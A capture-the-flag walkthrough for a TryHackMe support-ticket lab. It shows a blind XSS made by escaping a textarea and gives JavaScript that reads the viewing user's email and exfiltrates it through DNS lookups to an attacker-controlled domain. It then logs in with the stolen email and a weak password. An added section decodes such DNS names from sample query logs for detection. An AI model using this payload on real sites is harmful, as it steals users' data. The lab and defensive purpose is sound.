Step 1: Create a user account on the portal

Step 2: Create a ticket and note that by escaping the textarea tag you can perform XSS

Step 3: (Blind XSS) Get an external source where you can log requests, i.e. the TryHackMe request logger or Burp Suite, and you'll notice that if you put an external source into the XSS, i.e. </textarea><img src="external src">, you won't get an HTTP call but just a DNS lookup. This is because the machine's firewall only allows external connections for DNS.

Step 4: You'll notice that the email address you're logged in with is displayed at the top right of the screen. This is what you need to steal from the account that is viewing your support tickets. Using a combination of the blind XSS and the request logger you'll be able to exfiltrate this information through DNS requests. You can achieve this with the code sample below.

// Read the logged-in user's email from the page
let str = document.getElementById('email').innerText;
let encoded = '';
for (let i = 0; i < str.length; i++) {
    // Start a new DNS label every 20 characters (60 digits), staying under the 63-byte label limit
    if (i == 20 || i == 40 || i == 60 || i == 80) {
        encoded += '.';
    }
    // Zero-pad each character code to three digits
    encoded += String("00" + str.charCodeAt(i)).slice(-3);
}
// The hostname lookup itself carries the data; the firewall lets the DNS query out
document.write('<img src="http://' + encoded + '.{{your-unique-domain-on-burp-or-thm}}/">');

Step 5: You'll now be able to decode the email address and see that it is [email protected]
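The decoding step above is also what a defender would run over DNS query logs to spot this kind of exfiltration. This is an added example, not code from the original writeup: it scans constructed log lines for names built from the 3-digit character-code encoding shown in Step 4 and recovers the text. The log format, client addresses, names and the logger domain are all made up for the example.

```javascript
// Added example (not from the original writeup): detect and decode DNS names that
// carry text as zero-padded 3-digit character codes, as the payload above produces.

const MIN_CHARS = 4; // ignore very short numeric labels (e.g. reverse-DNS lookups)

// A label is "encoded" when it is all digits and splits evenly into 3-digit groups.
function isEncodedLabel(label) {
  return /^\d+$/.test(label) && label.length % 3 === 0;
}

// Decode the leading encoded labels of a queried name. Returns null when the
// name does not fit the encoding (wrong shape, non-printable code, too short).
function decodeExfilName(qname) {
  const labels = qname.replace(/\.$/, '').split('.');
  let text = '';
  for (const label of labels) {
    if (!isEncodedLabel(label)) break; // first non-encoded label: the rest is the logger domain
    for (let i = 0; i < label.length; i += 3) {
      const code = Number(label.slice(i, i + 3));
      if (code < 32 || code > 126) return null; // not printable ASCII: not this encoding
      text += String.fromCharCode(code);
    }
  }
  return text.length >= MIN_CHARS ? text : null;
}

// Constructed query-log lines: "<time> <client> query: <name> IN <type>".
// The second line encodes "alice@security.example" with a label break after 20 characters.
const SAMPLE_LOG = [
  '2024-01-01T10:00:00Z 10.0.0.5 query: www.example.test IN A',
  '2024-01-01T10:00:01Z 10.0.0.5 query: 097108105099101064115101099117114105116121046101120097109112.108101.logger.test IN A',
  '2024-01-01T10:00:02Z 10.0.0.7 query: 123.45.67.89.in-addr.arpa IN PTR',
];

// Return one finding per suspicious query: { time, client, qname, decoded }.
function findExfil(lines) {
  const findings = [];
  for (const line of lines) {
    const m = line.match(/^(\S+) (\S+) query: (\S+) IN (\S+)$/);
    if (!m) continue;
    const decoded = decodeExfilName(m[3]);
    if (decoded !== null) findings.push({ time: m[1], client: m[2], qname: m[3], decoded });
  }
  return findings;
}

for (const f of findExfil(SAMPLE_LOG)) {
  console.log(`${f.time} ${f.client} exfiltrated: ${f.decoded}`);
}
```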

Step 6: Using this email address you'll be able to get past the login page, since the password is simply 123123, and then view the support ticket to get the THM flag.